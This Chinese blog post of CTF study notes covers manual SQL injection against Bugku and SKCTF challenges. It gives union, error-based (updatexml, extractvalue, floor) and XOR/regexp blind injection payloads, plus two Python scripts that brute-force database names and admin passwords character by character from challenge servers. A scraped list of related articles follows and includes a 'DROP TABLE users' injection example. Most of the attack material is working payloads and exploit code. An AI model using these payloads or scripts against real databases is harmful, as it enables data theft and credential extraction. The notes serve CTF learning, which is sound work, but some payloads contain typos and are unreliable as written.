SQL注入学习

最新推荐文章于 2024-03-30 09:46:32 发布
最新推荐文章于 2024-03-30 09:46:32 发布
阅读量449 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: WEB 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43627829/article/details/90056058

SQL 注入

在晓得CTF已经有7个月了。。sql注入题都是sqlmap一把梭(一直咕咕咕,太羞耻了,终于要学一下手工注入了

普通手工简单注入大致流程

  1. 判断注入点,fuzz过滤
  2. 判断字段数
  3. 获取基本信息(数据库名称,表名,字段名)
0x01 bugku-成绩单

发现1'#正常返回,啥也没过滤,直接爆字段数,数据库名,表名,字段名

1' order by 4#		//获取字段数
5' union select database(),user(),version(),version()#		//获取数据库名称 skctf_flag
5' union select table_name,table_name,table_name,table_name from information_schema.tables where table_schema='skctf_flag'#		//获取表名	fl4g
5' union select column_name,column_name,column_name,column_name from information_schema.columns where table_name='fl4g'#	//获取字段名  skctf_flag
5' union select skctf_flag,skctf_flag,skctf_flag,skctf_flag from fl4g#		//获取内容

得到flag

0x02 这是一个神奇的神奇的登录框

1"发现有mysql报错,刚刚好看了利用报错注入(用普通注入也可以的

  1. 使用updatexml报错注入
1" and updatexml(1,concat(0x7e,database()),0)#		//数据库名称:bugkusql1
1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),0)#		//表名:flag1
1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='flag1' limit 0,1)),0)#		//字段名:flag1
1" and updatexml(1,concat(0x7e,(select flag1 from flag1 )),0)#		//ed6b28e684817d9efcaf802979e57ae

//使用extractvalue()报错
poload:1" and extractvalue(0,concat(0x7e,version()))#
//使用floor()报错
pyload:1" and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#
使用floor()报错注意最后会多出来一个1

盲注

常见盲注注入方式
异或(XOR)注入

payload:admin'^(ascii(mid(version()from(1)))>'1')^'1'='1'#
前面和后面语句都固定为真,只有中间不确定,整个payload的结果都由中间的结果决定

1^0^1 --> 0
1^1^1 --> 1

不需要and or (空格) ,
这里如果=被过滤还可以使用<>
如果过滤了注释符和%那就把最后一个单引号去掉^'1'='1

regexp注入

payload

order by盲注

payload

0x03 login3(SKCTF)

bp抓包,使用爆破模块fuzz一下过滤
在这里插入图片描述
发现^,<,>没被过滤,使用第一个异或盲注

import requests
url = 'http://123.206.31.85:49167/index.php'
str1 = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/=()"
req = requests.Session()
def databases():
    database = ""
    for j in range(40):
        for i in str1:
            post = {
                "username":"admin'^(ascii(mid(database()from({})))<>{})^('1'<'2')#".format(str(j),ord(i)),
                "password":"123"
            }
            # print(post)
            text = req.post(url,data=post).content.decode('utf-8')
            if "username does not exist!" in text:
                database+=str(i)
                print(database)
                break
            #print(text)
    print(database)
def password():
    passwd = ""
    for j in range(40):
        for i in str1:
            post = {
                "username": "admin'^(ascii(mid((password)from({})))<>{})^('1'<'2')#".format(str(j), ord(i)),
                "password": "123"
            }
            # print(post)
            text = req.post(url, data=post).content.decode('utf-8')
            if "username does not exist!" in text:
                passwd += str(i)
                print(passwd)
                break
            # print(text)
    print(passwd)
password()

在fuzz时发现infomation被过滤不能得到表名和字段名
通过admin'^(select(1)from(admin))^1#这个payload来撞表名
猜字段用admin'^(select(count(password))from(admin))^1#来撞表名

得到admin的密码的md5()

0x04 sql注入2(bugku)

与上一题类似,比上一题多过滤了#
所以payload改为admin'^(ascii(mid(database()from({})))<>{})^'1'='1

import requests
url = 'http://123.206.87.240:8007/web2/login.php'
str1 = ".1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/=()"
req = requests.Session()
def databases():
    database = ""
    for j in range(40):
        for i in str1:
            post = {
                "uname":"admin'^(ascii(mid(database()from({})))<>{})^'1'='1".format(str(j),ord(i)),
                "passwd":"123"
            }
            #print(post)
            text = req.post(url,data=post).content.decode('utf-8')
            #print(text)
            if "username error!!@_@" in text:
                database+=str(i)
                print(database)
                break
            #print(text)
    print(database)
def password():
    passwd = ""
    for j in range(40):
        for i in str1:
            post = {
                "uname": "admin'^(ascii(mid((passwd)from({})))<>{})^'1'='1".format(str(j), ord(i)),
                "passwd": "123"
            }
            # print(post)
            text = req.post(url, data=post).content.decode('utf-8')
            if "username error!!@_@" in text:
                passwd += str(i)
                print(passwd)
                break
            # print(text)
    print(passwd)

password

0' or (select database()regexp'{}{}$') or '1'='

0' or (select table_name from infomation.scheam.table where table.scheam='pikachu')regexp'a$'

0' or (select (select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1) regexp 'r$') 		//表名

0' or (select (select group_concat(column_name) from information_schema.columns where table_name='fiag' limit 1) regexp 'd$') or '1'='  	//字段名

0' or (select (select group_concat(fl$4g) from fiag limit 1) regexp 't$') or '1'='

得到admin的密码,打开输入ls

sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 703
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
SQL 注入天书.pdf
08-06
总的来说,《SQL注入天书》及配套的sqli-labs提供了全面的SQL注入学习路径,从基础到高级,从理论到实践,有助于安全专业人士和开发人员增强对这一重要安全威胁的理解和应对能力。通过深入学习和实践,可以有效地...
简单sql注入学习
weixin_33807284的博客
08-26 151
sql注入是什么? 所谓SQL注入,就是通过把SQL命令插入到Web表单提 交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据 库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP...
SQL TIPS
Andrewniu的博客
12-05 437
SQL语言,是结构化查询语言(Structured Query Language)的简称。SQL语言是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统;同时也是数据库脚本文件的扩展名。 1,collate是一个子句,可应用于数据库定义或列定义以定义排序规则,或应用于字符串表达式以应用排序规则投影。 语法是collate collation_name  
SQL 语法——DEFAULT(约束向列中插入默认值)
weixin_50920631的博客
03-30 1248
sql注入学习简单记录
我的学习笔记
02-28 526
参考文章参考学习:http://bbs.pediy.com/thread-218235.htmGoogle search:inurl:"products.php?prodID="inurl:buy.php?category=http://testphp.vulnweb.com/listproducts.php?cat=1http://testphp.vu...
实验吧-简单的注sql入 writeup
qq_24966613的博客
11-29 684
解题链接: http://ctf5.shiyanbar.com/web/index_2.php 1.输入id值,通过回显发现题目应该是进行了空格过滤 2.使用sqlmap进行注入    2.1  python sqlmap.py  -u “http://ctf5.shiyanbar.com/web/index_2.php?id=1” –random-agent  –tamper=space2comm
SQL注入学习整理
05-17
在本“SQL注入学习整理”中,我们将深入探讨这个主题,了解其工作原理、危害,以及如何预防和修复SQL注入漏洞。 1. **SQL注入原理**: SQL注入的基础是利用不安全的SQL查询。当用户提供的数据未经验证就直接与...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
注入
weixin_43245269的博客
06-29 742
注入关1 最简单的SQL注入 分值: 100 Tips题目里有简单提示 用户名:admin or '1=1' 密码:随意 成功! 注入关2 最简单的SQL注入(熟悉注入环境) 分值: 100 最简单的SQL注入 http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 or ‘1=1’ 获得flag。 -- 数字型注入点select * from 表名 where id=1 http://xxx
python函数的定义def(参数,参数)、与sql的存储过程一样
水亦流人必上的博客
06-08 408
def xie(a,b): #def定义名称(xie)这个函数、下面是代码段 print(a,'定义这句话',b,'2个变量分开') xie('第1个变量值是:','第2个变量值是:') #调用xie这个函数、这里的字符串代表的是print里的a和b def xie2(c,d): c=7674 d=567687 print(c,'定义这句话','2个变量分开',d) xie2('','') ...
python写sql语句_Python操作文件模拟SQL语句功能
weixin_39987847的博客
11-24 727
一、需求当然此表你在文件存储时可以这样表示1,Alex Li,22,13651054608,IT,2013-04-01 现需要对这个员工信息文件,实现增删改查操作1. 可进行模糊查询,语法至少支持下面3种:1. select name,age from staff_table where age > 222. select * from staff_table where dept = "IT"...
CTF解题-网安实验室(注入关)
道阻且长,行则将至
09-03 4492
万能密码 【题目环境】 最简单的SQL注入 分值: 100 Tips:题目里有简单提示 通关地址 【解题过程】 查看网页源码,提示使用admin登录: 直接上万能密码——admin';#、admin' #、admin' or 1=1 #密码随便输,登录成功: ...
网络安全实验室CTF—注入关 writeup
Senimo
08-02 2599
网络安全实验室CTF—注入关 writeup最简单的SQL注入最简单的SQL注入(熟悉注入环境)防注入到底能不能回显邂逅ErrorBased盲注SQL注入通用防护据说哈希后的密码是不能产生注入的 网络安全实验室CTF链接 最简单的SQL注入 最简单的SQL注入(熟悉注入环境) 防注入 到底能不能回显 邂逅 ErrorBased 盲注 SQL注入通用防护 据说哈希后的密码是不能产生注入的 ...
网络安全攻防实验室通关教程-注入
热门推荐
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一题:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2题:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
Android Studio 100 tips and tricks
weixin_33716941的博客
11-08 120
关于本文本文是想总结一些Android Studio的使用技巧,对于大多数习惯了使用eclipse的人来说,可能会须要一段时间,可是假设看过以下的一些介绍,你就能体会到Android Studio的强大之处了,只是本文列举的也仅仅是冰山一角,深入了解后会有很多其它值得你发现的!ps:因为时间关系,翻译可能有不全、有错,希望大家能一起修正,请在留言中指出,我会修正~thx快捷提示:ctrl+sp...
hackinglab-注入关-第1题
u012851380的博客
11-20 948
输入用户名、密码为admin’ or ‘1’='1 flag出现
sql注入学习
最新发布
03-14
<think>嗯,用户想学习SQL注入的相关知识,特别是防护技巧和示例教程。首先,我需要整理一下现有的引用内容,看看有什么可以直接帮助他的地方。引用[1]提到了SQL注入的基础、盲注、Timing Attack、攻击技巧和防御方法,包括预编译语句和存储过程。引用[3]详细解释了PDO预处理如何防止注入,而引用[4]和[5]则提供了具体的代码示例,比如使用参数化查询。引用[2]可能是一个系统的学习资源,可以作为推荐。 用户需要学习路径,应该从基础开始,逐步深入。首先得了解什么是SQL注入,然后学习攻击类型,再掌握防护方法,最后通过示例巩固。防护部分要强调预编译和参数化查询,因为引用[3]、[4]、[5]都提到了这些方法,并且是有效的防御手段。同时,要指出常见的误区,比如引用[1]提到的存储过程不一定安全,需要正确使用。 可能还需要考虑用户的实际操作,提供代码示例会更好。例如,引用[4]的Python示例和引用[5]的PHP示例,展示如何正确使用参数化查询。此外,引用[3]中的PDO预处理说明可以作为另一个例子。要确保用户理解预处理语句的重要性,避免拼接SQL字符串。 另外,用户可能对如何检测注入点感兴趣,引用[1]提到了注入点检测,这部分可以简要介绍。还要推荐系统学习资源,比如引用[2]的教程,帮助用户全面学习SQL。最后,生成相关问题时要覆盖攻击类型、防御方法、预编译原理和应用场景,这样用户可以有进一步的学习方向。</think>### 如何系统学习SQL注入及防护技巧? #### 一、SQL注入基础知识 1. **核心原理** SQL注入是通过构造特殊输入参数,利用未严格校验的SQL语句拼接漏洞,使数据库执行非预期操作。例如:`SELECT * FROM users WHERE username = '${userInput}'`,若输入`admin' OR 1=1 -- `,会绕过认证[^1][^3]。 2. **攻击类型** - **盲注**:通过数据库响应差异推断信息(如布尔盲注、时间盲注) - **联合查询注入**:利用`UNION`拼接恶意查询 - **报错注入**:触发数据库错误回显敏感信息 - **Timing Attack**:通过延时函数判断条件真假[^1] --- #### 二、防护技巧与示例 1. **参数化查询(核心方法)** 使用预编译语句(Prepared Statements)将输入数据与SQL逻辑分离: ```python # Python示例(引用[4]) cursor.execute("SELECT * FROM user WHERE name = %s", (user_input,)) ``` ```php // PHP示例(引用[5]) $stmt = $conn->prepare("SELECT * FROM users WHERE username = ?"); $stmt->bind_param("s", $userInput); ``` 2. **防御误区** - 存储过程仍需参数化,否则仍可能被注入 - 仅过滤特殊字符(如单引号)不彻底,存在绕过风险[^3] 3. **深度防护** - **最小权限原则**:数据库账户仅授予必要权限 - **输入校验**:白名单验证数据类型(如数字、固定格式) - **日志监控**:记录异常SQL请求 --- #### 三、实战学习路径 1. **实验环境搭建** 使用DVWA(Damn Vulnerable Web Application)或SQLi Labs练习注入技巧。 2. **案例解析** ```sql -- 经典注入示例 SELECT * FROM products WHERE id = 1; DROP TABLE users-- ``` 防护后: ```python # 使用参数化查询避免(引用[3][^4]) cursor.execute("SELECT * FROM products WHERE id = ?", (product_id,)) ``` --- #### 四、推荐学习资源 1. 系统教程:《跟老吕学SQL》专栏(引用[2]) 2. 漏洞复现:OWASP SQL注入实验手册 3. 进阶内容:数据库引擎安全机制(如MySQL的`sql_mode`) ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值